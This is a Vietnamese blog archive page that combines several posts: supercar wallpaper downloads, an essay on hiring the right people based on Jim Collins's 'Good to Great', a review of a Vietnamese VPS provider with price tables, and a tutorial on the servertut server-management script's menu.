Bạn có sở thích là siêu xe, hay đơn giản bạn bị mê hoặc bởi những chiếc xe đắc tiền với vẻ bề ngoài bóng bẩy và luôn ao ước 1 lần được chạm vào nó! Bộ sưu tập hình nền siêu xe Lamborgini tuyệt đẹp này sẽ làm cho màn hình desktop của bạn đẹp hơn, sang trọng hơn và thoả mãn ham muốn của bạn. Còn chần chừ gì nữa mà không tải ngay bộ ảnh nền này về máy tính


Bây giờ các bạn sẽ được chiêm ngưỡng bộ sưu tập những chú ngựa sắt tuyệt đẹp. Bộ hình nền có độ phân giải HD các bạn có thể trang trí cho màn hình desktop của mình hoành tráng hơn.






Download Wallpaper: Siêu xe môtô
Dung lượng: 3.24MB

Chủ Nhật, 5 tháng 1, 2014

Con người đi trước

"Sẽ có những lúc chúng tôi không thể đợi ai được. Nào, bây giờ bạn phải quyết định ở yên trên xe hay xuống xe"
- Ken Kesey -


VẤN ĐỀ KHÔNG PHẢI LÀ BẠN TRẢ LƯƠNG CHO AI, BẰNG CÁCH NÀO

Trong quyển sách "Từ tốt đến vĩ đại", Jim Collins đã phân tích báo cáo để trả lời câu hỏi: lương thưởng có phải đã đóng vai trò chính trong việc đưa công ty từ tốt đến vĩ đại hay không?

Điểm khác biệt mà ông tìm thấy giữa một công vĩ đại và một công ty đối trọng, đối thủ trực tiếp là "số tiền thưởng trong vòng 10 năm sau thời điểm nhảy vọt" mà lãnh đạo nhận được "hơi ít hơn so với những người đương chức tại các công ty đối trọng lúc này vẫn chỉ là những công ty tầm thường".

Những người vĩ đại như Colman Mockler - cựu CEO của Gillete, David Maxwell - 1 trong 10 CEO vĩ đại nhất mọi thời đại, hay Darwin Smith - lãnh đạo sự thay đổi của Kimberly-Clark chắc chắn không phải là những người đi làm không công. Rõ ràng các công ty cũng đã tính đến điều này, nhưng một khi bạn thiết lập được một được một hệ thống lương thưởng hợp lý thì chế độ lương thưởng cho lãnh đạo không phải là biến số quan trọng trong việc đưa công ty từ  tốt đến vĩ đại. Jim giải thích:
Vì sao lại thế? Đơn giản vì đây là một cách nhìn khác về nguyên lý "con người đi trước": Vấn đề không phải là bạn trả lương lãnh đạo như thế nào, mà là vấn đề trước tiên là nhà lãnh đạo nào được trả lương. Nếu bạn chọn đúng người trên "chuyến xe kinh doanh" của bạn, họ sẽ làm tất cả mọi thứ trong quyền hạn để xây dựng một công ty vĩ đại, không phải vì những gì họ sẽ nhận được, mà chỉ đơn giản là họ không thể nghĩ mình chấp nhận điều gì kém hơn. Các giá trị sống của họ buộc họ phải xây dựng sự xuất sắc, và bạn không thể thay đổi điều này bằng một chế độ lương thưởng, cũng giống như bạn không thể buộc họ phải thở hay nín thở vậy! Các công ty nhảy vọt hiểu một sự thật đơn giản: Người được chọn đúng sẽ làm việc cần thiết và mang lại kết quả tốt nhất họ có thể, bất chấp chế độ lương thưởng.
Ông kết luận
Chế độ động viên và lương thưởng là quan trọng, nhưng vì những lý do rất khác đối với các công ty nhảy vọt. Mục đích của chế độ lương thưởng không phải là để có được hành vi thích hợp từ những người không phù hợp, mà là để đưa những người thích hợp lên chuyến xe ngay từ đầu, và giữ họ lại trên xe sau đó.
TÌM NGƯỜI NGƯỜI THÍCH HỢP TRONG KHẮC NGHIỆT

Những công ty tìm kiếm người thích hợp theo nguyên lý kể trên là những công ty khắc nghiệt. Nếu bạn không có những gì công ty cần, bạn không thể ở lại lâu. Tuy nhiên cần phân biệt rõ thế nào là khắc nghiệt, thế nào là tàn nhẫn vì chúng khác biệt rất lớn.
Nền văn hóa tàn nhẫn nghĩa là chặt chém vô tội vạ, nhất là trong những thời điểm khó khăn, hay tự do đuổi việc mọi người mà không cần suy xét thấu đáo. Nền văn hóa khắc nghiệt nghĩa là luôn luôn áp dụng nguyên tắc đề ra mọi lúc mọi nơi, nhất là với cấp lãnh đạo. Nền văn hóa khắc nghiệt, nhưng không tàn nhẫn giúp những giỏi nhất không phải lo lắng về công ăn việc làm của họ và có thể tập trung hoàn toàn cho công việc.
Jim kể lại câu chuyện Wells Fargo mua lại Crocker Bank năm 1986 để phân biệt hai khái niệm này 
Nhóm điều hành của Wells Fargo đã kết luận ngay từ đầu rằng đa số các giám đốc của Crocker không phải là người thích hợp trên chuyến xe. Những người làm việc cho Crocker từ lâu đã ngấm những truyền thống và đặc quyền của văn hóa ngân hàng kiểu cũ, điển hình là họ có một nhà ăn dành cho lãnh đạo bằng cẩm thạch, có đầu bếp riêng và bộ chén dĩa trị giá 500.000 đô la. Điều này hoàn toàn trái ngược với văn hóa khổ hạnh tại Wells Fargo, cấp lãnh đạo cũng phải ăn thức ăn do một dịch vụ nhà ăn ký túc xá cung cấp. Well Fargo đã nói rõ với giám đốc của Crocker "Nghe này, đây không phải một vụ sáp nhập của hai công ty ngang hàng, đây là một vụ mua lại. Chúng tôi mua lại các chi nhánh và các khách hàng, chúng tôi không mua lại các bạn." Well Fargo đã chấm dứt hợp đồng với hầu hết mọi người trong nhóm điều hành - 1.600 người đã ra đi trong ngày đầu tiên - trong đó gần hết những thành viên điều hành cấp cao.
Một ví dụ khác là Nucor, công ty Fortune 300 và là nhà sản xuất thép lớn nhất nước Mỹ.
Nucor xây dựng toàn bộ hệ thống dựa trên ý tưởng rằng bạn có thể dạy cho người nông dân cách sản xuất thép, nhưng bạn không thể dạy phong cách làm việc kiểu nông dân cho những người từ đầu không có những đức tính này.
Đức tính của người nông dân là gì?
Những người đi ngủ sớm, dậy từ tinh mơ, và bắt tay ngay vào việc, không chút màu mè. Những câu nói như "Phải vắt sữa bò thôi", "Phải cày xong bốn mươi mẫu ở phía bắc trước buổi trưa" đã chuyển thành "Phải cuộn mấy tấm thép lại", và "Phải đúc xong bốn mươi tấn trước bữa trưa". Nucor đã loại bỏ những ai không có được thái độ làm việc tương tự, và trong năm đầu tiên, tỉ lệ bỏ việc lên đến 50%, nhưng sau đó tỉ lệ này xuống rất thấp khi chỉ còn lại những con người thích hợp với công việc về lâu dài.
Jim đúc kết : "Con người không phải là tài sản quan trọng nhất. Con người phù hợp mới là quan trọng, đó mới chính là tài sản quý nhất"

NHƯ THẾ NÀO LÀ KHẮC NGHIỆT
Có 3 nguyên tắc kỷ luật thực hành cần phải theo

Nguyên tắc 1:  Khi còn do dự, đừng vội tuyển, hãy tiếp tục tìm kiếm. 
Nhà sáng lập của HP đã mang lại cho Jim một quy luật bất biến của khoa học quản trị là "Luật Packard" : "Không công ty nào có thể liên tục tăng doanh thu nhanh hơn khả năng tuyển dụng đúng người để thực hiện sự tăng trường này mà vẫn có thể phát triển thành một công ty vĩ đại. Nếu tỉ lệ tăng trưởng doanh thu cứ liên tục cao hơn tỉ lệ tuyển dụng nhân sự, đơn giản là bạn không thể xây dựng một công ty vĩ đại".

Vì tuyển dụng rất khó khăn, nên việc tìm người luôn đòi hỏi sự nỗ lực rất lớn của lãnh đạo, đặc biệt là các vị trí cao. Facebook và Dropbox còn sử dụng một quy trình tuyển dụng ít người biết đến tên gọi là Searchlight để tìm người phù hợp: những cuộc gặp ngắn tầm 30 phút, vui vẻ với âm nhạc, đồ uống và cả quà tặng - cứ 15 phút thì có một chiếc iPad được trao thưởng.

Ngoài ra, một số liệu bạn nên biết: tuyển thông qua giới thiệu (referral) là tốt nhất. Các vị trí tuyển qua cách này sẽ tăng 25% lợi nhuận và giảm 20% tỉ lệ nghỉ việc so với tuyển dụng thông thường.

Nguyên tắc 2:  Khi bạn biết phải thay đổi nhân sự, hãy hành động ngay
Đây có lẽ là một trong những quy luật giữ cho môi trường luôn luôn khắc nghiệt, ai chinh phục thách thức được tưởng thưởng, ai không làm việc hiệu quả sẽ ra đi. Quy luật này cũng không khác mấy với cách mà Jack Ma Yun đã làm tại Alibaba.

Yahoo CEO Marissa Mayer đã sa thải một vị trí rất cao ở công ty là COO, Henrique De Castro - cựu nhân viên Google chỉ sau 15 tháng được thuê, chấp nhận đền bù 20 triệu USD cổ phiếu. Trong ghi chú gửi cho nhân viên, Mayer đã viết:
Trong suy nghĩ của tôi, rất khó khăn để quyết định COO của chúng ta - Henrique de Castro - nên rời khỏi công ty.
Một câu ngắn gọn nhưng phần nào nói lên tính cách quyết liệt của CEO, khi cần phải hành động sẽ hành động. Recode đã phiên dịch ý của câu này này
Một cách trung thực và thắn thắn, tôi hy vọng mọi người sẽ quên đi việc tôi đã thuê, trả cho anh ta quá nhiều và không hành động sớm hơn khi mọi việc không tốt.
Jim đã nhận định về khía cạnh là người quản lý
Chúng ta chờ đợi, chúng ta chần chừ, chúng ta thử nhiều cách, tạo cơ hội thứ ba thứ tư, chúng ta hy vọng tình hình sẽ thay đổi.. nhưng tình hình không hề cải thiện. Thời gian và công sức chúng ta dành cho người đó đã lấy đi sức lực của ta thay vì dành cho phát triển và làm việc với những con người phù hợp. Chúng ta cứ bị hành hạ như thế cho tới khi người đó tự động nghỉ việc (thật .. may mắn quá!) hay cuối cùng chúng ta cũng phải hành động (ta cũng thật mừng cho mình). Trong lúc đó, những người giỏi của chúng ta sẽ tự hỏi:"Sao lâu thế mà (sếp) không hành động?"
Do dự để người không phù hợp vẫn làm việc là không công bằng với những người phù hợp, vì rõ ràng họ phải bù đắp cho những thiếu sót của người kia. Tệ hơn là điều này có thể đẩy những người phù hợp ra đi. Những người làm việc hiệu quả về bản chất được khích lệ bởi hiệu suất cao, khi họ thấy nỗ lực của mình bị cản trở vì phải gánh thêm phần của người khác, dần dần họ sẽ cảm thấy bất mãn.
Tôi có dịp làm việc với một bạn đồng nghiệp tên là Phượng Bùi, một trong những bạn Sales giỏi nhất mà tôi biết. Công việc Sales luôn đòi hỏi nỗ lực rất lớn, yêu cầu số một luôn là "đủ số" - cam kết về doanh thu.  Tôi hỏi bạn ấy : "Nếu trong team của Phượng có một bạn không đạt KPI, theo nguyên tắc thì bạn ấy phải ra đi. Hiển thấy như thế là rất tàn nhẫn, không thể vì một lần mà ngay lập tức sa thải. Phượng sẽ hành động thế nào?"

Phượng trả lời : "Em luôn cho bạn ấy rất nhiều cơ hội chứ không phải chỉ một lần. Nếu có nhiều cơ hội mà bạn ấy vẫn không thể đạt được thì nếu có cho nghỉ cũng là tâm phục khẩu phục".

Người Việt Nam nói chung, cái gì cũng nên "có tình có lý", hoàn toàn KPIs thì e là cũng khó. Chúng ta cần thời gian để chọn được người thích hợp. Nhưng bao nhiêu lần thì đủ? Bao nhiêu thời gian sẽ cho chúng ta biết là người đó không thích hợp? Bạn hãy tự hỏi 2 câu hỏi
  1. Nếu bây giờ bạn có cơ hội tuyển người này lại thêm một lần nữa, bạn có tuyển không?
  2. Nếu người này đến gặp bạn để nói rằng họ muốn ra đi để theo đuổi một cơ hội mới tốt hơn, liệu bạn sẽ cảm thấy thất vọng hay trong lòng lấy làm mừng rỡ?
Nguyên tắc 3: Giao cho người giỏi nhất cơ hội tốt nhất, đừng giao họ rắc rối lớn nhất

Philip Moriss, công ty sở hữu thương hiệu thuốc lá Marlboro - thương hiệu thuốc lá bán chạy số 1 thế giới - vào những năm 1960 có chưa tới 1% doanh thu từ thị trường quốc tế. Joe Cullman, lãnh đạo của công ty lúc đó xác định thị trường quốc tế là cơ hội tốt nhất và duy nhất để phát triển lâu dài.

Ông đã suy nghĩ về một chiến lược tốt nhất để phát triển và cuối cùng đã đi đến một câu trả lời tuyệt vời: Vấn đề không phải là cái gì, mà là ai. Ông đưa vị giám đốc số 1 của mình, George Weissman, lúc đó đang quản lý thị trường nội địa sang quản lý thị trường quốc tế. Weissman kể lại cảm xúc lúc đó: "Tôi không biết mình bị cho ra rìa, bị ném xuống đất, hay bị ném qua cửa sổ nữa. Mới hôm qua tôi điều hành 99% công ty, hôm nay chỉ còn 1% hay thậm chí ít hơn nữa."
Như tạp chí Forbes nhận xét 20 năm sau, quyết định của Cullman đưa Weissman sang phần công việc nhỏ nhất công ty là một quyết định thiên tài. Tinh tế và tao nhã, Weissman là người hoàn toàn thích hợp để phát triển thị trường châu Âu, và ông đã đưa thị trường quốc tế thành bộ phận lớn nhất và phát triển nhanh nhất công ty. Sự thật là, dưới quyền điều hành của Weissman, Marlboro trở thành nhãn hiệu thuốc lã bán chạy nhất trên thế giới ba năm trước khi nó trở thành nhãn hiệu số 1 trên thị trường Mỹ.
Kết luận: Ý tưởng "con người đi trước" là một ý tưởng đơn giản dễ hiểu, nhưng .. khó thực hiện. Câu chuyện của Maxwell tại Fannie Mae mà Jim kể lại vào thời điểm Fannie Mae đang thua lỗ mỗi ngày 1 triệu USD cộng với số nợ 56 tỉ đô la  sẽ là một câu chuyện thích hợp để kết thúc bài viết
Khi Maxwell trở thành tổng giám đốc Fannie Mae trong những ngày đen tối nhất, Hội đồng quản trị rất mong muốn biết ông sẽ cứu công ty bằng cách nào. Mặc dù áp lực phải hành động là rất lớn, phải làm điều gì đó thật to lớn, nắm lấy bánh lái và bắt đầu lái, nhưng Maxwell vẫn ưu tiên tập trung vào việc tìm người phù hợp cho nhóm lãnh đạo của Fannie Mea. Hành động đầu tiên của ông là phỏng vấn tất cả các nhà quản lý. Ông mời họ ngồi và nói: "Thử thách này sẽ rất khó khăn. Tôi muốn nói cho anh biết rằng công việc sắp tới đòi hỏi rất khắt khe. Nếu anh nghĩ mình sẽ không phù với áp lực mới của công việc thì cũng chẳng sao. Không ai trách móc anh vì điều này cả."
Maxxell nói rõ rằng chỉ có chỗ cho những người hạng A sẵn sàng bỏ công sức A+, nếu bạn không sẵn lòng như thế, bạn nên xuống xe ngay, ngay lúc này. Một giám đốc mới vừa bỏ cả cuộc đời và sự nghiệp để vào làm ở Fannie Mae đã đến gặp Maxwell và nói: "Tôi đã nghe ông nói rất kỹ, và tôi không muốn sống thế này." Thế là ông này bỏ công ty về làm lại chỗ cũ. Cuối cùng, mười bốn trong số hai mươi sáu giám đốc đã rời bỏ công ty, và được thay thế bằng những vị giám đốc giỏi nhất, nhạy bén nhất, siêng năng nhất trong toàn giới tài chính. Cùng một tiêu chuẩn này áp dụng từ trên xuống dưới trong toàn bộ Fannie Mae, các vị giám đốc thay máu nhân viên và tạo áp lực cho nhau, khiến cho tỉ lệ nghỉ việc rất cao do nhiều người không chịu được sự chỉ trích. Một thành viên lãnh đạo cấp cao cho biết: "Chúng tôi có một câu nói với nhau 'Anh không thể giả tạo được ở Fannie Mae'. Hoặc là anh biết rất rõ công việc của mình hoặc không, nếu anh không biết, thì anh sẽ bị cho ra rìa
Dick Cooley của Wells Fargo  và David Maxwell đều thể hiện ý tưởng đưa con người đi trước công việc, tầm nhìn, chiến lược, chiến thuật, tổ chức công ty, trước công nghệ. Họ đã  phát biểu: "Tôi không biết chúng tôi đưa công ty đi về đâu, nhưng tôi biết rằng nếu tôi bắt đầu với những con người thích hợp, đặt cho họ câu hỏi thích hợp, và dẫn dẫn dắt họ vào những cuộc tranh luận nảy lửa, chúng tôi sẽ tìm ra cách đưa công ty này thành vĩ đại" 

Thứ Bảy, 4 tháng 1, 2014

Đánh giá, nhận xét về dịch vụ VPS của Ngọc Trang Network Solutions

Về Công ty giải pháp mạng Ngọc Trang ( Ngoc Trang Network Solutions), tôi đã có lần nhắc đến trong bài viết giới thiệu về servertut script. Đây là công ty cung cấp các dịch vụ liên quan đến máy chủ, do Nguyễn Văn Tiến, tác giả của servertut script làm giám đốc.



Đến trang chủ của Ngọc Trang
Các dịch vụ mà Ngọc Trang cung cấp bao gồm:


  • Dịch vụ VPS Linux.

  • Dịch vụ máy chủ vật lý ảo VDS Linux. Nó cũng như VPS thôi nhưng cấu hình lớn hơn.

  • Dịch vụ VPS Windows.

  • Dịch vụ máy chủ Streaming, Fileserver và CDN.

  • Dịch vụ máy chủ riêng (Dedicated Server).

  • Dịch vụ quản trị máy chủ  (Managed Service).

Do tò mò muốn biết xem servertut script được đưa vào thương mại hóa trông như thế nào, tôi đã mua một gói VPS Linux của Ngọc Trang để dùng thử. Cảm nhận ban đầu là:


Về ưu điểm:


  • Cấu hình các gói dịch vụ tương đối tốt; các gói dịch vụ đa dạng, khách hàng có thể dễ dàng lựa chọn gói phù hợp cho nhu cầu của mình.

  • Giá cả chấp nhận được, có thể nói là rẻ. Các gói dịch vụ Linux VPS có giá chỉ bằng khoảng ½ giá gói dịch vụ tương đương của DigitalOcean (so sánh này hơi khập khiễng vì VPS của Ngọc Trang ảo hóa bằng OpenVZ còn DigitalOcean ảo hóa bằng KVM). Tuy nhiên, Các bạn có thể tham khảo bảng giá một số dịch vụ của Ngọc Trang ở cuối bài viết này.

  • Hỗ trợ nhanh và do là dịch vụ của người Việt nên dễ trao đổi, nhờ vả.

Menu chính của Ngọc Trang script



  • Server cài đặt sẵn Ngọc Trang Script (phiên bản thương mại của servertut script với một số chức năng được bổ sung thêm như cài đặt Memcache, WebUI File Manager), dễ sử dụng.

  • Kết quả benchmark VPS cho thấy hiệu suất của server, tốc độ download là tốt.

  • Hình thức thanh toán đơn gián (Paypal hoặc chuyển khoản ngân hàng. Dịch vụ được cung cấp nhanh sau khi thanh toán hoàn tất.

Về hạn chế:


  • VPS ảo hóa bằng công nghệ OpenVZ, không tốt bằng các công nghệ ảo hóa khác như Xen, KVM.

  • Dung lượng ổ cứng có thể nói là quá khiêm tốn, băng thông cho các gói hơi nhỏ. Gói Linux VPS lớn nhất là LVPS-4096M cũng chỉ có 40Gb HDD, băng thông chỉ 400 Gb.

  • Ngọc Trang không quản lý các VPS bằng SolusVM, do đó không có nhiều công cụ quản lý VPS nâng cao. Mặc dù trong phần giới thiệu dịch vụ, Ngọc Trang cho biết là người dùng có thể cài lại hệ điều hành nhưng thực tế thì không. Muốn cài lại, bạn phải mở ticket nhờ kỹ thuật. Điều này rất bất tiện cho những người hay vọc do phải chờ đợi hỗ trợ, mặc dù support của Ngọc Trang đáp ứng các yêu cầu hỗ trợ có thể nói là nhanh.

Giao diện quản lý VPS trong trang người dùng của Ngọc Trang



Do chỉ mới sử dụng dịch vụ VPS Linux của Ngọc Trang, thời gian sử dụng cũng chưa nhiều nên tôi chỉ “dám” nhận xét vài điều như vậy. Nhìn chung, dịch vụ của Ngọc Trang rất đáng để lựa chọn sử dụng vì giá cả hợp lý, hỗ trợ tốt. Các bạn có thể tham khảo đánh giá toàn diện hơn về các dịch vụ Ngọc Trang của Thạch Phạm tại đây


Đến trang chủ của Ngọc Trang


Tham khảo kết quả benchmark VPS Linux gói LVPS-2048M của Ngọc Trang.

Kết quả benchmark bằng công cụ của FreeVPS.us



Kết quả benchmark bằng công cụ VPS Bench



Kết quả benchmark bằng công cụ UnixBench 4.10



Kết quả benchmark bằng công cụ UnixBench 5.1.2



Kết quả benchmark bằng công cụ UnixBench 5.1.2



Bảng giá một số dịch vụ của Ngọc Trang

Linux VPS












MINI LINUX VPS



MEDIUM LINUX VPS



LVPS-512M


60,000 vnđ/tháng


1 nhân CPU


100Mbps cổng mạng


5GB Disk Raid10


50GB băng thông


512MB RAM



LVPS-2048M


240,000 vnđ/tháng


2 nhân CPU


100Mbps cổng mạng


20GB Disk Raid10


200GB băng thông


2048MB RAM



LVPS-1024M


120,000 vnđ/tháng


1 nhân CPU


100Mbps cổng mạng


10GB Disk Raid10


100GB băng thông


1024MB RAM



LVPS-3072M


360.000vnđ/tháng


2 nhân CPU


1Gbps cổng mạng


30GB Disk Raid10


300Gb băng thông


3072MB RAM



LVPS-1536M


180,000 vnđ/tháng


1 nhân CPU


100Mbps cổng mạng


15GB Disk Raid10


150GB băng thông


1536MB RAM



LVPS-4096M


480.000vnđ/tháng


2 nhân CPU


1Gbps cổng mạng


40GB Disk Raid10


400Gb băng thông


4096MB RAM



Windows VPS







WVPS-1G


200,000 vnđ/tháng


1 nhân CPU


100Mbps cổng mạng


50GB Disk Raid10


500GB băng thông


1GB RAM



WVPS-2G


400,000 vnđ/tháng


2 nhân CPU


1000Mbps cổng mạng


100GB Disk Raid10


1000GB băng thông


2GB RAM



WVPS-3G


600,000 vnđ/tháng


3 nhân CPU


1000Mbps cổng mạng


150GB Disk Raid10


1500GB băng thông


3GB RAM



 Cloud vDedicated SSD Server







VD6G-SSD


600,000 VNĐ


8Ghz CPU


1Gbit/s Network


30GB SSD Raid10


1000Gb Bandwidth


6GB DDR3 ECC


100% Uptime Guaranteed


01 Dedicated IP


Up to 04 Websites



VD8G-SSD


800,000 VNĐ


10Ghz CPU


1Gbit/s Network


40GB SSD Raid10


2000Gb Bandwidth


8Gb DDR3 ECC


100% Uptime Guaranteed


02 Dedicated IP


Up to 05 Websites



VD16G-SSD


1,600,000 VNĐ


14Ghz CPU


1Gbit/s Network


80GB SSD Raid10


3000Gb Premium BW


12GB DDR3 ECC


100% Uptime Guaranteed


03 Dedicated IP


Up to 07 Websites



 Đến trang chủ của Ngọc Trang




Nguồn: Đánh giá, nhận xét về dịch vụ VPS của Ngọc Trang Network Solutions

Servertut Script bài 3: Hướng dẫn sử dụng các chức năng trong menu chính

Trong hai bài trước, tôi đã hướng dẫn cài đặt servertut scriptgiới thiệu một số công cụ mà servertut scrip cung cấp. Bài viết này sẽ giới thiệu cụ thể các chức năng quản lý có trong menu chính của script này.



Thông tin có thể bạn cần:


Để có thể thực hành ngay các hướng dẫn trên VPS, bạn nên đăng ký tài khoản tại DigitalOcean và sử dụng mã khuyến mãi để có 10 USD miễn phí . Với 10 USD miễn phí này, bạn có thể sử dụng gói VPS 512MB RAM trong 2 tháng hoặc sử dụng gói VPS 1Gb RAM trong 1 tháng.


Xem hướng dẫn đăng ký tài khoản DigitalOcean và cách sử dụng mã khuyến mãi tại đây. Các mã khuyến mãi tốt nhất của Digital Ocean được cập nhật thường xuyên tại đây



Để gọi menu chính, thực hiện lệnh:


servertut-menu

Lệnh trên sẽ liệt kê những chức năng của Servertut Script. Trong phiên bản 0.5 (phiên bản cuối cùng mà diễn đàn servertut.com cho cập nhật và cũng là phiên bản mà tôi đang giới thiệu), menu chính gồm có 20 mục. Để chọn chức năng cần thực hiện, bạn nhập số tương ứng rồi Enter.


Script có thể sẽ hỏi xác nhận xem bạn có thực sự muốn thực hiện yêu cầu ko, với đuôi [y/N] hoặc [Y/n] . Nếu bạn đồng ý thì gõ y rồi enter, không thì ngược lại. Chữ cái nào in hoa chính là mặc định câu trả lời của bạn nếu ko gõ gì mà enter


Khi bạn thao tác bất kỳ yêu cầu nào tại menu này, lập tức sẽ có email thông báo cho bạn biết, gửi tới email bạn nhập lúc cài đặt Script.


1. Thêm website


Mặc định VPS/Server khi cài đặt Servertut Script đã có sẵn một website chính, tuy nhiên chắc chắn rằng nhiều người sẽ không chỉ muốn chạy một site trên server mà chạy rất nhiều site. Do đó đây là một tính năng rất hay.


Để thêm website, sau khi vào menu chính, các bạn gõ số 1 và ấn enter, lúc đó sẽ có yêu cầu nhập tên website bạn cần thêm. Bạn nhập đầy đủ tên website bạn muốn thêm vào (không cần có http://www) và Enter. Script sẽ nhanh chóng hoàn tất công việc và thông báo cho bạn các thông tin về thư mục chứa log, thư mục web, bạn chỉ cần upload code lên thư mục web là chạy.



Thư mục web của domain mới được thêm vào trên server



Chú ý: Script không phân biệt với domain và subdomain. Bạn có thể thêm subdomain giống như thêm domain độc lập vậy.


2. Xóa website


Nếu bạn chọn chức năng này, cấu hình vhost của website và toàn bộ dữ liệu của website (không bao gồm database mysql nếu có) sẽ bị xóa bỏ. Ở menu chọn bạn nhập số 2 và enter để đi tới chức năng này



3. Sao lưu code


Chức năng này sẽ tạo một bản sao lưu toàn bộ file và folder ( không bao gồm các file và folder ẩn ) nằm trong thư mục public_html của website. Nếu bản sao lưu cũ còn tồn tại trên server, nó sẽ hỏi bạn có muốn xóa cái cũ và tạo cái mới hay không. File sao lưu được nén với định dạng tar.gz, link download sẽ được gửi về email lúc cài đặt script.




Lưu ý: Sript kiểm tra file index.php để xác định sự tồn tại của website. Nếu trong thư mục web của bạn không có file này sẽ bị báo lỗi không tìm thấy website hoặc website chưa có dữ liệu.


4. Sao lưu data


Các bạn lưu ý là khác với sao lưu code, nếu bạn sao lưu mysql database khi website đang chạy rất có thể dẫn tới file sao lưu bị lỗi. Tốt hơn hết nên tạm thời off website, sao lưu xong hãy bật trở lại, hoặc lựa chọn thời điểm ít người truy cập nhất để sao lưu. File sao lưu dạng nén sql.gz, link download gửi về email



5. Tự động sao lưu


Nhập tên cơ sở dữ liệu mysql bạn muốn tự động sao lưu vào. Script sẽ check xem data đó có tồn tại hay không, tiếp theo là check xem đã được tự động sao lưu chưa, rồi mới tiến hành yêu cầu cài đặt ngày giờ sao lưu


Giờ sao lưu : Nhập vào số từ 0 đến 23, 0 ứng với 0h sáng hay 12h đêm


Thứ sao lưu : Số 0 và số 7 ứng với chủ nhật, số 1 ứng với thứ 2, số 2 ứng với thứ 3….



6. Tắt tự động sao lưu


Loại bỏ database ra khỏi danh sách tự động sao lưu, nó sẽ yêu cầu bạn nhập tên data, nếu có trong danh sách tự động sao lưu thì nó sẽ gỡ bỏ, nếu ko có thì nó ko làm gì hết



7. Tạo database


Database được tạo ở menu này mặc định sẽ có charset utf8, ko sợ lỗi font tiếng việt, có tùy chọn có tạo tên người dùng và mật khẩu dành riêng cho data đó hay không. Sau khi tạo data và người dùng xong, nó sẽ gán full quyền cho người dùng đó lên data đó luôn. Để an toàn, mỗi data bạn hãy dùng 1 user riêng



8. Xóa database


Tương tự như xóa website, script sẽ check xem data tồn tại hay ko, nếu có thì nó xóa, lưu ý là việc xóa database không thể phục hồi.



9. Đổi pass VPS


Tính năng này hỗ trợ bạn dễ dàng đổi pass cho user root



10. Cài đặt Ioncube Loader


Ioncube Loader là một addon của PHP giúp giải mã mã nguồn, là yêu cầu bắt buộc phải có để chạy các mã nguồn bị mã hóa, thường là các mã nguồn thương mại. Tính năng này của script giúp bạn dễ dàng cài đặt Ioncube Loader lên server.



11. Hỗ trợ bật/tắt APC Opcode Cache


APC Opcode Cache là rất tốt để giảm tải cho server, tuy nhiên, trong một số thao tác, ví dụ nếu bạn đang chỉnh sửa code trực tiếp trên server… thì nó  sẽ gây nhiều khó chịu. Tính năng này của script sẽ giúp bạn bật/tắt APC Opcode Cache dễ dàng.


12. Hỗ trợ bật/tắt phpMyAdmin


phpMyAdmin với port tùy chọn của bạn là tương đối an toàn. Tuy nhiên, tốt nhất bạn chỉ nên bật phpMyAdmin khi cần dùng, dùng xong thì tắt nó đi.



13. Hỗ trợ cài đặt PageSpeed


Module ngx_pagespeed là module được thiết kế bởi nhóm Google Dev nhằm tăng tốc độ website và cải thiện hiệu quả SEO trên webserver Nginx. Tính năng này của script giúp bạn kích hoạt PageSpeed cho các website mà bạn đang chạy trên server.


Chú ý rằng, bạn phải thực hiện đối với từng domain riêng, mà không thể kích hoạt tất cả các domain một lúc.



14. Hỗ trợ bật/tắt BTSync


BTSync là công cụ giúp bạn đồng bộ VPS/Server với máy tính.



15. Downtime Statics


Bật/tắt tính năng lưu trữ thông tin về số lần server mất kết nối


16. Thêm Park Domain


Parked Domain là thêm tên miền mới vào chạy chung với hosting của tên miền chính, tên miền được thêm sẽ chạy chung với cấu trúc file/forder của tên miền chính. Ví dụ: bạn có domainchinh.com, bạn sử dụng chức năng parked domain cho domainphu.com. Lúc này, hai domain sẽ chạy chung trên hosting và sử dụng cấu trúc file giống nhau.



Lưu ý:


Nhap vao ten mien ban muon chay song song roi an [ENTER]: Bạn nhập domain phụ


Nhap vao ten website dich ma ban muon domain phụ chay song song voi: Ban nhập domain chính


17. Redirect domain


Sử dụng tính năng này khi bạn muốn tự động chuyển hướng domain tới một domain khác.



18. Cập nhật Script:


Do script không còn được tiếp tục phát triển cho mục đích miễn phí nên chức năng này không còn sử dụng được.


19. Gỡ bỏ script:


Cần thiết nếu bạn không còn muốn sử dụng script nữa.


20. Thoát khỏi menu chính


Với các chức năng nêu trên, có lẽ đã tương đối đủ để bạn quản lý server của riêng mình và đảm bảo cho server hoạt động tốt.




Nguồn: Servertut Script bài 3: Hướng dẫn sử dụng các chức năng trong menu chính